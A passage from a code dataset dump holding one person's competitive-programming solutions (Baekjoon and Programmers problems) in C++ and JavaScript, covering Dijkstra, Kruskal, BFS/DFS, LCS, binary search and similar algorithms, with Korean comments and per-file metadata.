순서: 왼쪽 위 -> 오른쪽 위 -> 왼쪽 아래 -> 오른쪽 아래\n*/\n#include <iostream>\n#define MAX 64\nusing namespace std;\n\nint n;\nint arr[MAX][MAX];\n\nvoid solve(int size, int r, int c){\n int check = arr[r][c];\n int dr[4] = {0, 0, size / 2, size / 2};\n int dc[4] = {0, size / 2, 0, size / 2};\n\n for(int i = r ; i < r + size ; i++){\n for(int j = c ; j < c + size ; j++){\n if(arr[i][j] != check){\n printf(\"(\");\n for(int k = 0 ; k < 4 ; k++) solve(size / 2, r + dr[k], c + dc[k]);\n printf(\")\");\n\n return;\n }\n }\n }\n\n printf(\"%d\", check); // 해당 범위가 0 또는 1로만 이루어진 경우\n}\n\nint main() {\n ios_base::sync_with_stdio(0); cin.tie(0); cout.tie(0);\n scanf(\"%d\", &n);\n\n for(int i = 0 ; i < n ; i++){\n for(int j = 0 ; j < n ; j++){\n scanf(\"%1d\", &arr[i][j]);\n }\n }\n\n solve(n, 0, 0);\n\n return 0;\n}" }, { "alpha_fraction": 0.4931506812572479, "alphanum_fraction": 0.521268904209137, "avg_line_length": 22.133333206176758, "blob_id": "da8cbf673c076115a642c5aa726562a9eda687e0", "content_id": "fabe5058e029e540ca0632e2f2dac05650cb265e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1405, "license_type": "no_license", "max_line_length": 94, "num_lines": 60, "path": "/BOJ/Dijkstra/13549_2.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "/*\nBOJ 13549번: 숨바꼭질 3\n2022-01-12\nDijkstra Algorithm ver.\n*/\n#include <iostream>\n#include <vector>\n#include <queue>\n#include <algorithm>\n#define MAX 100001\n#define INF 1e9\nusing namespace std;\n\nvector<pair<int,int>> graph[MAX];\nint sec[MAX];\nint mv[3] = {-1, 1, 2};\n\nvoid dijkstra(int start){\n priority_queue<pair<int,int>, vector<pair<int,int>>, greater<pair<int,int>>> pq; // 시간, 위치\n \n pq.push({0, start});\n sec[start] = 0;\n\n while(!pq.empty()){\n int curTime = pq.top().first;\n int curLocation = pq.top().second;\n int nextLocation, nextTime;\n pq.pop();\n\n if(curTime > sec[curLocation]) continue;\n for(int i = 0 ; i < 3 ; i++) {\n if(i < 2) {\n nextLocation = curLocation + mv[i];\n nextTime = sec[curLocation] + 1;\n }\n else {\n nextLocation = curLocation * 2;\n nextTime = sec[curLocation];\n }\n\n if(nextLocation < 0 || nextLocation > MAX - 1) continue;\n if(sec[nextLocation] > nextTime) {\n sec[nextLocation] = nextTime;\n pq.push({nextTime, nextLocation});\n }\n }\n }\n}\n\nint main(){\n ios_base::sync_with_stdio(0); cin.tie(0); cout.tie(0);\n int n, k;\n cin >> n >> k;\n\n fill(sec, sec + MAX, INF);\n dijkstra(n);\n cout << sec[k];\n\n return 0;\n}" }, { "alpha_fraction": 0.36186420917510986, "alphanum_fraction": 0.38449472188949585, "avg_line_length": 21.89230728149414, "blob_id": "7fce27d10e27569220cf9af2876f771820e2e123", "content_id": "6c070943d1b3f283f944d42273e097bbb162182d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 4505, "license_type": "no_license", "max_line_length": 65, "num_lines": 195, "path": "/BOJ/Implementation/3425.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "/*\nBOJ 3452번: 고스택\nDATE: 2021-07-06\n*/\n#include <iostream>\n#include <vector>\n#define MAX 1000000000\n#define MIN -1000000000\nusing namespace std;\n\nvector<long long> stk, num;\nvector<string> command;\nlong long n;\n\nbool program()\n{\n int cnt = 0;\n\n //명령어 실행\n for (int i = 0; i < command.size(); i++)\n {\n if (command[i] == \"NUM\")\n {\n // num 벡터에 있는 값 사용\n stk.push_back(num[cnt++]);\n }\n else if (command[i] == \"POP\")\n {\n if (stk.size() < 1) return false;\n stk.pop_back();\n }\n else if 
(command[i] == \"INV\")\n {\n if (stk.size() < 1) return false;\n\n long long tmp = stk.back();\n tmp = -tmp;\n\n stk.pop_back();\n stk.push_back(tmp);\n }\n else if (command[i] == \"DUP\")\n {\n if (stk.size() < 1) return false;\n stk.push_back(stk.back());\n }\n else if (command[i] == \"SWP\")\n {\n if (stk.size() < 2) return false;\n\n long long tmp1 = stk.back();\n stk.pop_back();\n long long tmp2 = stk.back();\n stk.pop_back();\n\n stk.push_back(tmp1);\n stk.push_back(tmp2);\n }\n else if (command[i] == \"ADD\")\n {\n if (stk.size() < 2) return false;\n\n long long tmp1 = stk.back();\n stk.pop_back();\n long long tmp2 = stk.back();\n stk.pop_back();\n\n long long num = tmp1 + tmp2;\n if (num > MAX || num < MIN) return false;\n else stk.push_back(num);\n }\n else if (command[i] == \"SUB\")\n {\n if (stk.size() < 2) return false;\n\n long long tmp1 = stk.back();\n stk.pop_back();\n long long tmp2 = stk.back();\n stk.pop_back();\n\n long long num = tmp2 - tmp1;\n if (num > MAX || num < MIN) return false;\n else stk.push_back(num);\n }\n else if (command[i] == \"MUL\")\n {\n if (stk.size() < 2) return false;\n\n long long tmp1 = stk.back();\n stk.pop_back();\n long long tmp2 = stk.back();\n stk.pop_back();\n\n long long num = tmp1 * tmp2;\n if (num > MAX || num < MIN) return false;\n else stk.push_back(num);\n }\n else if (command[i] == \"DIV\")\n {\n if (stk.size() < 2) return false;\n\n long long tmp1, tmp2, num;\n tmp1 = stk.back();\n stk.pop_back();\n tmp2 = stk.back();\n stk.pop_back();\n\n if (tmp1 == 0) return false;\n\n if ((tmp1 > 0 && tmp2 > 0) || (tmp1 < 0 && tmp2 < 0))\n num = tmp2 / tmp1;\n else\n { //음수 한개\n num = abs(tmp2) / abs(tmp1);\n num = -num;\n }\n\n stk.push_back(num);\n }\n else if (command[i] == \"MOD\")\n {\n if (stk.size() < 2) return false;\n\n long long tmp1, tmp2, num;\n tmp1 = stk.back();\n stk.pop_back();\n tmp2 = stk.back();\n stk.pop_back();\n\n if (tmp1 == 0)\n return false;\n\n if (tmp2 < 0)\n {\n num = abs(tmp2) % tmp1;\n num = -num;\n }\n else if (tmp2 > 0)\n {\n num = tmp2 % tmp1;\n }\n\n stk.push_back(num);\n }\n }\n\n return true;\n}\n\nint main()\n{\n ios_base::sync_with_stdio(0); cin.tie(0); cout.tie(0);\n\n while (1)\n {\n string str;\n command.clear();\n num.clear();\n\n while (1)\n {\n cin >> str;\n if (str == \"END\") break;\n else if (str == \"QUIT\") return 0;\n else if (str == \"NUM\")\n {\n int a;\n cin >> a;\n command.push_back(str);\n num.push_back(a);\n }\n else\n command.push_back(str);\n }\n\n cin >> n;\n \n for (int i = 0; i < n; i++)\n {\n int input;\n cin >> input;\n\n stk.clear();\n stk.push_back(input);\n\n if (!program() || stk.size() != 1)\n cout << \"ERROR\\n\";\n else\n cout << stk[0] << '\\n';\n }\n cout << '\\n';\n }\n\n return 0;\n}" }, { "alpha_fraction": 0.38449999690055847, "alphanum_fraction": 0.4074999988079071, "avg_line_length": 22, "blob_id": "a7e571b8e5de2bb7ece58be10f379e098d140f66", "content_id": "04fc6bbd89b6129304ee2a5f78c8b612fb9c4ea9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 2130, "license_type": "no_license", "max_line_length": 71, "num_lines": 87, "path": "/BOJ/Implementation/15686.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UHC", "text": "/*\nBOJ 15686번: 치킨 배달\nDATE: 2021-04-17\n*/\n#include <iostream>\n#include <vector>\n#include <queue>\n#include <cstdlib>\nusing namespace std;\n\nvector<pair<int, int>> cv; //치킨집\nvector<pair<int, int>> hv; //집\npair<int, int> p[13]; //조합한 치킨집\npriority_queue<int, vector<int>, greater<int>> 
pq;\nint city[51][51];\nint n, m, dst, new_dst, c_dst;\n\nvoid combination(int depth, int next){ //순서X, 중복X\n if(depth == m){ //치킨거리 구하기\n c_dst = 0;\n \n for(int i = 0 ; i < hv.size() ; i++){\n int x = hv[i].first;\n int y = hv[i].second;\n dst = 100;\n \n for(int j = 0 ; j < m ; j++){\n new_dst = abs(x - p[j].first) + abs(y - p[j].second);\n dst = min(dst, new_dst);\n }\n c_dst += dst;\n }\n\n pq.push(c_dst);\n\n return;\n }\n\n for(int i = next ; i <= cv.size() ; i++){\n p[depth] = cv[i - 1];\n combination(depth + 1, i + 1);\n }\n}\n\n\nint main(){\n ios_base::sync_with_stdio(0); cin.tie(0); cout.tie(0);\n cin >> n >> m;\n\n for(int i = 1 ; i <= n ; i++){\n for(int j = 1 ; j <= n ; j++){\n cin >> city[i][j];\n\n if(city[i][j] == 1) {\n hv.push_back(make_pair(i, j)); //집(1) 위치\n }\n else if(city[i][j] == 2){\n cv.push_back(make_pair(i, j)); //치킨집(2) 위치\n }\n }\n }\n\n if(m == cv.size()){ //바로 치킨 거리 구하기\n c_dst=0;\n\n for(int i = 0 ; i < hv.size() ; i++){\n int x = hv[i].first;\n int y = hv[i].second;\n dst = 100;\n \n for(int k = 0 ; k < cv.size() ; k++){\n new_dst = abs(x - cv[k].first) + abs(y - cv[k].second);\n dst = min(dst, new_dst);\n }\n\n c_dst += dst;\n }\n }\n else{ //치킨 가게가 최대 m개 있어야하는 경우: cv.size()개 중에 m개를 선택하는 조합 \n combination(0, 1);\n c_dst = pq.top();\n }\n\n cout << c_dst;\n\n return 0;\n}" }, { "alpha_fraction": 0.4762253165245056, "alphanum_fraction": 0.49890270829200745, "avg_line_length": 18, "blob_id": "c471533b4acca44711b7be092898010a2ee90018", "content_id": "d719a1699f76782532e8c682f4456ea73e0ffe96", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1383, "license_type": "no_license", "max_line_length": 58, "num_lines": 72, "path": "/BOJ/MST/14621.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "/*\nBOJ 14621번: 나만 안되는 연애\nDATE: 2022-03-03\nKruskal Algorithm\n*/\n#include <iostream>\n#include <vector>\n#include <algorithm>\n#define MAX 1001\nusing namespace std;\n\nchar gender[MAX];\nvector<pair<int, pair<int,int>>> edge;\nint parent[MAX];\n\nint getParent(int x){\n if(x == parent[x]) return x;\n return parent[x] = getParent(parent[x]);\n}\n\nint findParent(int a, int b){\n a = getParent(a);\n b = getParent(b);\n\n if(a == b) return 1;\n else return 0;\n}\n\nvoid unionParent(int a, int b){\n a = getParent(a);\n b = getParent(b);\n\n if(a < b) parent[b] = a;\n else parent[a] = b;\n}\n\nint main(){\n ios_base::sync_with_stdio(0); cin.tie(0); cout.tie(0);\n int n, m, ans = 0, cnt = 0;\n int a, b, c;\n char ch;\n\n cin >> n >> m;\n \n for(int i = 1 ; i <= n ; i++) cin >> gender[i];\n\n for(int i = 0 ; i < m ; i++){\n cin >> a >> b >> c;\n edge.push_back({c, {a, b}});\n }\n\n sort(edge.begin(), edge.end());\n\n for(int i = 1 ; i <= n ; i++) parent[i] = i;\n\n for(int i = 0 ; i < edge.size() ; i++){\n int x = edge[i].second.first;\n int y = edge[i].second.second;\n int z = edge[i].first;\n\n if(gender[x] != gender[y] && !findParent(x, y)){\n unionParent(x, y);\n ans += z;\n cnt++;\n }\n }\n\n if(cnt < n - 1) cout << -1;\n else cout << ans;\n\n return 0;\n}" }, { "alpha_fraction": 0.3427331745624542, "alphanum_fraction": 0.36616051197052, "avg_line_length": 24.065217971801758, "blob_id": "0387f6e6a84f2ba88b16253982e25559d7c84d3a", "content_id": "b93959f694032cf12bf0eaca674785064e7fca04", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 2381, "license_type": "no_license", "max_line_length": 71, "num_lines": 92, "path": "/BOJ/Brute 
Force/7490.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "/*\nBOJ 7490번: 0 만들기\n2021-12-20\nBrute force ver.\n*/\n#include <iostream>\n#include <vector>\n#include <algorithm>\nusing namespace std;\n\nvector<string> ans;\nint input, n, r;\nint dpArr[8] = {0,};\n\nvoid duplicatePermutation(int depth) {\n if(depth == r) { // 0: 더하기 1: 빼기 2: 붙이기\n int sum = 0, cnt = 0;\n string calc = \"1\", origin = \"1\", tmp;\n\n for(int i = 1 ; i <= r ; i++) {\n if(dpArr[i - 1] == 0) {\n tmp = \"+\" + to_string(i + 1);\n calc += tmp; origin += tmp;\n }\n else if(dpArr[i - 1] == 1) {\n tmp = \"-\" + to_string(i + 1);\n calc += tmp; origin += tmp;\n }\n else {\n calc += to_string(i + 1);\n origin += \" \" + to_string(i + 1);\n }\n }\n\n for(int i = 0 ; i < calc.length() ; i++) {\n tmp.clear();\n cnt = 0;\n\n if(isdigit(calc[i])) {\n while(isdigit(calc[i])){\n tmp += calc[i++];\n cnt++;\n }\n \n i--;\n\n if(cnt == 1) {\n if(calc[i - cnt] == '+') sum += calc[i] - '0';\n else if(calc[i - cnt] == '-') sum -= calc[i] - '0';\n else sum = calc[i] - '0';\n }\n else if(cnt > 1) {\n if(calc[i - cnt] == '+') sum += stoi(tmp);\n else if(calc[i - cnt] == '-') sum -= stoi(tmp);\n else sum = stoi(tmp);\n }\n }\n }\n\n if(sum == 0) ans.push_back(origin);\n return;\n }\n\n for(int i = 1 ; i <= n ; i++) {\n dpArr[depth] = i - 1;\n duplicatePermutation(depth + 1);\n }\n}\n\nint main() {\n ios_base::sync_with_stdio(0); cin.tie(0); cout.tie(0); \n int tc, input;\n cin >> tc;\n\n for(int i = 0 ; i < tc ; i++) {\n ans.clear();\n for(int j = 0 ; j < r ; j++) dpArr[j] = 0;\n\n cin >> input; // 1부터 n까지의 정수들\n\n n = 3; // + - 공백\n r = input - 1; // 연산자 개수\n\n duplicatePermutation(0); // 중복 순열\n\n sort(ans.begin(), ans.end()); // ASCII 순서에 따라 출력\n for(int j = 0 ; j < ans.size() ; j++) cout << ans[j] << \"\\n\";\n cout << '\\n';\n }\n\n return 0;\n}" }, { "alpha_fraction": 0.44594594836235046, "alphanum_fraction": 0.4797297418117523, "avg_line_length": 14.028985977172852, "blob_id": "ceacfca307fbecda5d189582ef6eca34c9bb8972", "content_id": "b0387a6fb0da42ad9f05b9ad88bdc67dd168902e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1040, "license_type": "no_license", "max_line_length": 55, "num_lines": 69, "path": "/BOJ/BFS_DFS/1260.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "/*BOJ 1260번: DFS와 BFS\nDATE: 2021-05-19\n*/\n#include <iostream>\n#include <queue>\n#define MAX 1001\n\nusing namespace std;\nint arr[MAX][MAX];\nbool visited[MAX] = { false, };\nint n, m, v;\n\nvoid dfs(int node) {\n\tvisited[node] = true;\n\tcout << node << \" \"; \n\n\tfor (int i = 1 ; i <= n ; i++) {\n\t\tif (arr[node][i] == 1 && visited[i] == false) { \n\t\t\tdfs(i); \n\t\t}\n\t}\n}\n\nvoid bfs(int node) {\n\tqueue <int> q;\n \n\tq.push(node); \n\tvisited[node] = true; \n\n\tcout << node << \" \"; \n\n\twhile (!q.empty()) { \n int front = q.front(); \n\t\tq.pop();\n\n\t\tfor (int i = 1; i <= n; i++) {\n\t\t\tif (arr[front][i] == 1 && visited[i] == false) {\n\t\t\t\tq.push(i);\n\t\t\t\tvisited[i] = true;\n\t\t\t\tcout << i << \" \"; \n\t\t\t}\n\t\t}\n\t}\n\n}\n\nint main() {\n\tios_base::sync_with_stdio(0); cin.tie(0); cout.tie(0);\n\n\tcin >> n >> m >> v;\n\n\tfor (int i = 0; i < m; i++) { \n\t\tint num1, num2;\n\t\tcin >> num1 >> num2;\n\t\tarr[num1][num2] = arr[num2][num1] = 1;\n\t}\n\n //DFS \n\tdfs(v);\n\tcout << \"\\n\";\n\n\tfor(int i = 0 ; i < MAX ; i++)\n\t\tvisited[i] = { false, };\n\n //BFS \n\t//bfs(v); \n\n\treturn 0;\n}" }, { 
"alpha_fraction": 0.44732576608657837, "alphanum_fraction": 0.5235008001327515, "avg_line_length": 21.88888931274414, "blob_id": "ac291b73a8c4df950d504d9a884396a5a970f949", "content_id": "46d8b372677b9eb979cea17e0ce74a47a458ad12", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 619, "license_type": "no_license", "max_line_length": 83, "num_lines": 27, "path": "/BOJ/Dynamic Programming/9251.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "/*\nBOJ 9251번: LCS\nDATE: 2021-08-01\nDynamic Programming (Longest Common Subsequence)\n*/\n#include <iostream>\n#include <algorithm>\nusing namespace std;\n\nint dp[1001][1001];\n\nint main(){\n ios_base::sync_with_stdio(0); cin.tie(0); cout.tie(0); \n string str1, str2;\n cin >> str1 >> str2;\n\n for(int i = 1 ; i <= str2.size() ; i++){\n for(int j = 1 ; j <= str1.size() ; j++){\n if(str2[i-1] == str1[j-1]) dp[i][j] = dp[i-1][j-1] + 1;\n else if(str2[i-1] != str1[j-1]) dp[i][j] = max(dp[i][j-1], dp[i-1][j]);\n }\n }\n\n cout << dp[str2.length()][str1.length()];\n\n return 0;\n}" }, { "alpha_fraction": 0.5469169020652771, "alphanum_fraction": 0.5871313810348511, "avg_line_length": 19.77777862548828, "blob_id": "8b021d9cc40a85135bd20115ff968d14c0f77e5d", "content_id": "bac6ccadff2b3f53e8b248430704b810faa54359", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 427, "license_type": "no_license", "max_line_length": 69, "num_lines": 18, "path": "/programmers/Level 2/camouflage.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "/*\nprogrammers Level 2: 위장\ndate: 2022-02-28\n*/\n#include <vector>\n#include <map>\nusing namespace std;\n\nint solution(vector<vector<string>> clothes) {\n int answer = 1;\n map<string, int> m;\n \n for(vector<string> v : clothes) m[v[1]] += 1;\n \n for(auto i : m) answer *= i.second + 1; // +1: 해당 종류를 입지 않는 경우 추가\n \n return answer - 1; // 아무 옷도 입지 않은 경우 제외\n}" }, { "alpha_fraction": 0.43633952736854553, "alphanum_fraction": 0.45888593792915344, "avg_line_length": 19.95833396911621, "blob_id": "847d61ff3c281d422df24b8696137b96620ed30d", "content_id": "d894a83803352dee974ab4b7dfa64d8ede7c4a4b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1514, "license_type": "no_license", "max_line_length": 63, "num_lines": 72, "path": "/programmers/Level 1/failure_rate.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "//programmers Level 1: 실패율\n//2019 KAKAO BLIND RECRUITMENT\n//2021-10-04\n#include <iostream>\n#include <algorithm>\n#include <vector>\n#include <map>\nusing namespace std;\n\nbool cmp(pair<double, int>a, pair<double, int>b) {\n \tif (a.first == b.first) {\n\t\treturn a.second < b.second;\n\t}\n\telse {\n\t\treturn a.first > b.first;\n\t}\n \n}\n\nvector<int> solution(int N, vector<int> stages) {\n vector<pair<double, int>> res(N);\n vector<int> answer;\n map<int, int> m;\n int idx = 0, total = stages.size(); \n int max = *max_element(stages.begin(), stages.end());\n\n sort(stages.begin(), stages.end());\n \n for(int i = 1 ; i <= max ; i++) {\n int cnt = 0;\n \n for(int j = idx ; j < stages.size() ; j++) {\n if(stages[j] == i) cnt++;\n else {\n idx = j;\n break;\n }\n }\n\n m.insert({i, cnt});\n }\n \n for(int i = 0 ; i < N ; i++) {\n total -= m[i];\n \n if(total <= 0) {\n res[i] = make_pair(0, i + 1);\n continue;\n }\n \n double num = double(m[i+1]) / total;\n res[i] = make_pair(num, i + 1);\n }\n 
\n sort(res.begin(), res.end(), cmp);\n \n for(int i = 0 ; i < res.size() ; i++) {\n answer.push_back(res[i].second);\n }\n \n return answer;\n}\n\nint main() {\n vector<int> answer = solution(5, {2, 1, 2, 6, 2, 4, 3, 3});\n \n for(int i = 0 ; i < answer.size() ; i++) {\n cout << answer[i] << \" \";\n }\n\n return 0;\n}" }, { "alpha_fraction": 0.5630885362625122, "alphanum_fraction": 0.5725046992301941, "avg_line_length": 22.130434036254883, "blob_id": "4335651996ef30c57aefbc13365b34302fd96f8a", "content_id": "02fdab540ccb45e2cad8939f21032ffc5faf46be", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 539, "license_type": "no_license", "max_line_length": 81, "num_lines": 23, "path": "/programmers/Level 2/the_biggest_number.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "// programmers Level 2: 가장 큰 수\n#include <string>\n#include <vector>\n#include <algorithm>\n#include <iostream>\nusing namespace std;\n\nbool cmp(string &a, string &b){\n return a + b > b + a;\n}\n\nstring solution(vector<int> numbers) {\n string answer = \"\";\n vector<string> v;\n \n for(int i = 0 ; i < numbers.size() ; i++) v.push_back(to_string(numbers[i]));\n sort(v.begin(), v.end(), cmp);\n\n for(int i = 0 ; i < v.size() ; i++) answer += v[i];\n answer = answer.front() == '0' ? \"0\" : answer;\n \n return answer;\n}" }, { "alpha_fraction": 0.466292142868042, "alphanum_fraction": 0.49719101190567017, "avg_line_length": 17.763158798217773, "blob_id": "b10e43ecd678df8dfe5721035e4d6d26c316d403", "content_id": "fd58409ed28cb452913363b2a815d9798ffe3d06", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 722, "license_type": "no_license", "max_line_length": 69, "num_lines": 38, "path": "/BOJ/Two Pointer/1484.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "/*\nBOJ 1484번: 다이어트\n2021-12-28\nTwo pointer\n*/\n#include <iostream>\n#include <vector>\n#include <algorithm>\nusing namespace std;\n\nint main() {\n ios_base::sync_with_stdio(0); cin.tie(0); cout.tie(0);\n int g;\n cin >> g;\n\n int arr[g];\n int start = 0, end = 0;\n vector<int> ans;\n\n for(int i = 0 ; i < g ; i++) arr[i] = i + 1;\n\n while(end < g) {\n int weight = arr[end] * arr[end] - arr[start] * arr[start];\n\n if(weight == g) ans.push_back(arr[end]);\n\n if(weight < g) end++;\n else start++;\n }\n\n if(ans.empty()) cout << -1;\n else {\n sort(ans.begin(), ans.end());\n for(int i = 0 ; i < ans.size() ; i++) cout << ans[i] << '\\n';\n }\n\n return 0;\n}" }, { "alpha_fraction": 0.5112782120704651, "alphanum_fraction": 0.5357142686843872, "avg_line_length": 21.20833396911621, "blob_id": "d08fa2b984526e45e4885e647c7b70e62d4acd8b", "content_id": "d38d03d549bf79c05735d41f0ee20b7b5107527d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 562, "license_type": "no_license", "max_line_length": 72, "num_lines": 24, "path": "/programmers/Level 2/open_chat_room.js", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "/*\nprogrammers Level 2: Open chat room\n2019 KAKAO BLIND RECRUITMENT\n2021-12-21\n*/\nfunction solution(record) {\n const answer = [];\n const user = {};\n\n record.forEach((item) => {\n const [state, uid, nick] = item.split(' ');\n\n if (state !== 'Leave') user[uid] = nick\n })\n\n record.forEach((item) => {\n const [state, uid, nick] = item.split(' ');\n\n if (state === 'Enter') answer.push(`${user[uid]}님이 들어왔습니다.`)\n else if 
(state === 'Leave') answer.push(`${user[uid]}님이 나갔습니다.`)\n })\n\n return answer;\n}" }, { "alpha_fraction": 0.39094650745391846, "alphanum_fraction": 0.44238683581352234, "avg_line_length": 17.730770111083984, "blob_id": "e3422d7dd997c33bb574869423bcf277fc0ea90a", "content_id": "8e49bb112a4fe50acfa63803e192e199b1a748e2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 500, "license_type": "no_license", "max_line_length": 63, "num_lines": 26, "path": "/BOJ/Prefix Sum/11659.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "/*\nBOJ 11659번: 구간 합 구하기 4\nDATE: 2022-01-21\nPrefix Sum\n*/\n#include <iostream>\nusing namespace std;\n\nint main(){\n ios_base::sync_with_stdio(0); cin.tie(0); cout.tie(0);\n int n, m;\n int a, b;\n cin >> n >> m;\n\n int arr[n + 1] = {0, };\n\n for(int i = 1 ; i <= n ; i++) cin >> arr[i];\n for(int i = 1 ; i <= n ; i++) arr[i] = arr[i - 1] + arr[i];\n\n for(int i = 0 ; i < m ; i++) {\n cin >> a >> b;\n cout << arr[b] - arr[a - 1] << '\\n';\n }\n\n return 0;\n}" }, { "alpha_fraction": 0.3680981695652008, "alphanum_fraction": 0.39614373445510864, "avg_line_length": 19.763635635375977, "blob_id": "4fe2dfb345cf1bb89613d5ed213fc7386e2e1ff2", "content_id": "bc1a8c00d1413daa82b8fc52619c3e938b149e83", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1155, "license_type": "no_license", "max_line_length": 58, "num_lines": 55, "path": "/BOJ/Graph Theory/2623.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "/*\nBOJ 2623번: 음악프로그램\nDATE: 2021-03-04\n*/\n#include <iostream>\n#include <vector>\n#include <queue>\nusing namespace std;\n\nint main(){\n ios_base::sync_with_stdio(0); cin.tie(0); cout.tie(0);\n int n, m;\n cin >> n >> m;\n\n int inDegree[n+1] = {0,}, result[n+1];\n vector<int> a[n+1];\n queue<int> q;\n\n for(int i = 0 ; i < m ; i++){\n int num; cin >> num;\n int arr[num];\n for(int j = 0 ; j < num ; j++){\n cin >> arr[j];\n }\n for(int k = 1 ; k < num ; k++){\n a[arr[k-1]].push_back(arr[k]);\n inDegree[arr[k]]++;\n }\n }\n\n for(int i = 1 ; i <= n ; i++){\n if(inDegree[i] == 0) q.push(i);\n }\n\n for(int i = 1 ; i <= n ; i++){\n if(q.empty()){\n cout << 0;\n return 0;\n }\n int front = q.front();\n q.pop();\n result[i] = front;\n for(int i = 0 ; i < a[front].size() ; i++){\n int next = a[front][i];\n if(--inDegree[next] == 0) \n q.push(next);\n }\n }\n//\n for(int i = 1 ; i <= n ; i++){\n cout << result[i] << \"\\n\";\n }\n\n return 0;\n}" }, { "alpha_fraction": 0.42069485783576965, "alphanum_fraction": 0.4478851854801178, "avg_line_length": 20.03174591064453, "blob_id": "e751b907e86a5f64d0f8b7fb4557980fc23094ef", "content_id": "3fb91dc51062bcb39dc8f03040e866681df53b46", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1352, "license_type": "no_license", "max_line_length": 69, "num_lines": 63, "path": "/BOJ/BFS_DFS/9177.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "/*\nBOJ 9177번: 단어 섞기\nDATE: 2021-09-19\n*/\n#include <iostream>\nusing namespace std;\n\nstring a, b, c;\nint n, a_length, b_length, c_length;\nbool flag;\n\nbool check() {\n int alpha[27] = {0,};\n\n for(int i = 0 ; i < a_length ; i++){\n alpha[a[i] - 'a']++;\n }\n for(int i = 0 ; i < b_length ; i++){\n alpha[b[i] - 'a']++;\n }\n for(int i = 0 ; i < c_length ; i++){\n alpha[c[i] - 'a']--;\n }\n for(int i = 0 ; i < 26 ; i++){\n if(alpha[i] != 0) \n return false;\n }\n\n return 
true;\n}\n\nvoid backtracking(int a_idx, int b_idx, int c_idx){\n if(flag) {\n return; //이거 안하면 시간초과 (ex a / aba / aaba)\n }\n if(c_idx == c_length) {\n flag = true;\n return;\n }\n\n if(a[a_idx] == c[c_idx]) backtracking(a_idx + 1, b_idx, c_idx+1);\n if(b[b_idx] == c[c_idx]) backtracking(a_idx, b_idx+1, c_idx+1);\n}\n\nint main(){\n ios_base::sync_with_stdio(0); cin.tie(0); cout.tie(0); \n cin >> n;\n\n for(int i = 0 ; i < n ; i++){\n flag = false;\n cin >> a >> b >> c;\n a_length = a.length(); \n b_length = b.length();\n c_length = c.length();\n\n if(check()) backtracking(0, 0, 0);\n \n if(flag) cout << \"Data set \" << i + 1 << \": yes\\n\";\n else cout << \"Data set \" << i + 1 << \": no\\n\";\n }\n\n return 0;\n}" }, { "alpha_fraction": 0.3944866955280304, "alphanum_fraction": 0.42585551738739014, "avg_line_length": 18.5, "blob_id": "b9ef84464d607466fbd3f392a01b7eaf71f0d681", "content_id": "86220f7f3d2e1521069cb225e9c9c6610994a967", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1124, "license_type": "no_license", "max_line_length": 60, "num_lines": 54, "path": "/BOJ/Binary Search/1477.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "/*\nBOJ 1477번: 휴게소 세우기\n2021-12-20\nBinary Search\n*/\n#include <iostream>\n#include <algorithm>\n#include <vector>\nusing namespace std;\n\nint main() {\n ios_base::sync_with_stdio(0); cin.tie(0); cout.tie(0);\n vector<int> v;\n int n, m, l, num;\n int start, end, mid, ans = 1000;\n cin >> n >> m >> l;\n\n v.push_back(0);\n for(int i = 0 ; i < n ; i++) {\n cin >> num;\n v.push_back(num);\n }\n v.push_back(l);\n\n sort(v.begin(), v.end());\n\n start = 1;\n end = l - 1;\n\n while(end >= start) {\n int rest = 0; // 휴게소 개수\n mid = (start + end) / 2;\n\n for(int i = 1 ; i < v.size() ; i++) {\n int dist = v[i] - v[i - 1];\n int cnt = dist / mid; // 두 휴게소 사이에 설치 가능한 휴게소 개수\n\n if(cnt > 0) { // 휴게소 설치 가능\n if(dist % mid == 0) rest += cnt - 1;\n else rest += cnt;\n }\n }\n\n if(rest > m) start = mid + 1;\n else {\n end = mid - 1;\n ans = min(mid, ans);\n }\n }\n\n cout << ans;\n\n return 0;\n}" }, { "alpha_fraction": 0.6053068041801453, "alphanum_fraction": 0.6650083065032959, "avg_line_length": 15.75, "blob_id": "7dbf06adbb5534c4a9610b922dc638797fc92d85", "content_id": 